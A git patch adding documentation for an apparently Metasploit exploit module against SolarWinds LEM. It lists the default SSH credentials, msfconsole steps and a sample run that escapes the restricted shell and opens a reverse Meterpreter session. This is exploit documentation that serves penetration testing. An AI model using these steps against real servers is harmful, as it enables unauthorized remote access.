From c87ea2107bc3123bdf40a30b65f74fc04a431b23 Mon Sep 17 00:00:00 2001 From: Mehmet Ince Date: Thu, 23 Mar 2017 12:49:50 +0300 Subject: [PATCH] Add documentation --- .../exploit/linux/ssh/solarwinds_lem_exec.md | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md diff --git a/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md b/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md new file mode 100644 index 0000000000..535d31b81c --- /dev/null +++ b/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md @@ -0,0 +1,49 @@ +## Vulnerable Application + +This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell. + +Vulnerable application can be download as a free trial from vendor webpage. +[http://www.solarwinds.com/log-event-manager](http://www.solarwinds.com/log-event-manager) + +## Verification Steps + + 1. Start msfconsole + 2. Do: `use exploit/linux/ssh/solarwinds_lem_exec` + 3. Do: `set rhost ` + 4. Do: `set lhost ` + 5. Do: `exploit` + 6. You should get a shell. + +## Scenarios + +This is a run against a known vulnerable Solarwinds LEM server. +``` +msf exploit(solarwind_lem_exec) > exploit + +[*] Started reverse TCP handler on 12.0.0.1:4444 +[*] 12.0.0.154:32022 - Attempt to login... +[+] SSH connection is established. +[*] Requesting pty... We need it in order to interact with menuing system. +[+] Pty successfully obtained. +[*] Requesting a shell. +[+] Remote shell successfully obtained. +[+] Step 1 is done. Managed to access terminal menu. +[+] Step 2 is done. Managed to select 'service' sub menu. +[+] Step 2 is done. Managed to select 'service' sub menu. +[+] Step 3 is done. Managed to start 'restrictssh' function. +[+] Step 4 is done. We are going to try escape from jail shell. +[+] Sweet..! Escaped from jail. +[*] Delivering payload... +[*] Sending stage (38651 bytes) to 12.0.0.154 +[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300 +[-] Exploit failed: Errno::EBADF Bad file descriptor +[*] Exploit completed, but no session was created. + +msf exploit(solarwind_lem_exec) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > getuid +Server username: cmc +meterpreter > +``` +